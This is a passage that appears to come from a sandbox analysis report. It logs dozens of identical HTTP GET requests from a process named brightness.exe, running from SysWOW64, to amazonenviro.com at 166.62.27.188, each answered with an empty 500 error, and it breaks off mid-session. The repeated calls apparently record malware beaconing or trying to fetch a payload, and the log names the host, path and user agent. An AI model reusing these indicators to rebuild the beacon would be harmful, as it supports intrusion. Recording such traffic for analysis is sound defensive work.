              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              69192.168.2.450157166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:00:39.359817028 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:00:40.278882980 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:00:40 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              70192.168.2.450159166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:00:40.414895058 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:00:41.347810984 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:00:41 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              71192.168.2.450161166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:00:41.495275974 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:00:42.407859087 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:00:42 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              72192.168.2.450163166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:00:42.544972897 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:00:43.472117901 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:00:43 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              73192.168.2.450165166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:00:43.609070063 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:00:44.560300112 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:00:44 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              74192.168.2.450167166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:00:44.697309017 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:00:45.646708012 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:00:45 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              75192.168.2.450169166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:00:45.840106010 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:00:46.772366047 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:00:46 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              76192.168.2.450171166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:00:46.936789036 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:00:47.850775957 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:00:47 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              77192.168.2.450173166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:00:48.006787062 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:00:48.919415951 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:00:48 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              78192.168.2.450175166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:00:49.054909945 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:00:49.968141079 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:00:49 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              79192.168.2.450177166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:00:50.099673033 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:00:51.007128954 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:00:50 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              80192.168.2.450179166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:00:51.196167946 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:00:52.118796110 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:00:51 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              81192.168.2.450181166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:00:52.259918928 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:00:53.182415962 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:00:53 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              82192.168.2.450183166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:00:53.310172081 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:00:54.243438959 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:00:54 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              83192.168.2.450185166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:00:54.372854948 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:00:55.295144081 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:00:55 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              84192.168.2.450187166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:00:55.477962017 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:00:56.418008089 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:00:56 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              85192.168.2.450189166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:00:56.545388937 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:00:57.476118088 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:00:57 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              86192.168.2.450191166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:00:57.605137110 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:00:58.553601027 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:00:58 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              87192.168.2.450193166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:00:58.680043936 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:00:59.657731056 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:00:59 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              88192.168.2.450195166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:00:59.785111904 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:01:00.713434935 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:01:00 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              89192.168.2.450197166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:01:00.839787960 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:01:01.769407988 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:01:01 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              90192.168.2.450199166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:01:01.899786949 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:01:02.843728065 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:01:02 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              91192.168.2.450201166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:01:02.970911026 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:01:03.896851063 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:01:03 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              92192.168.2.450203166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:01:04.022536993 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:01:04.939035892 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:01:04 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              93192.168.2.450205166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:01:05.065542936 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:01:06.028060913 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:01:05 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              94192.168.2.450207166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:01:06.155574083 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:01:07.124660969 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:01:06 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              95192.168.2.450209166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:01:07.255984068 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:01:08.205307961 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:01:08 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              96192.168.2.450211166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:01:08.332134962 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:01:09.279850006 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:01:09 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              97192.168.2.450213166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:01:09.409817934 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:01:10.443205118 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:01:10 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              98192.168.2.450215166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:01:10.574687958 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:01:11.519539118 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:01:11 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              99192.168.2.450217166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:01:11.655401945 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:01:12.572865009 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:01:12 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              100192.168.2.450219166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:01:12.709110975 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:01:13.637475967 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:01:13 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              101192.168.2.450221166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:01:13.803654909 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:01:14.739552975 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:01:14 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              102192.168.2.450223166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:01:14.873559952 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:01:15.790632963 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:01:15 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              103192.168.2.450225166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:01:15.923348904 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:01:16.849894047 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:01:16 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              104192.168.2.450227166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:01:16.980406046 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:01:17.908380032 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:01:17 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              105192.168.2.450229166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:01:18.035800934 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:01:19.000243902 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:01:18 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              106192.168.2.450231166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:01:19.135947943 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:01:20.073010921 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:01:19 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              107192.168.2.450233166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:01:20.209860086 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:01:21.121885061 CET244INHTTP/1.1 500 Internal Server Error
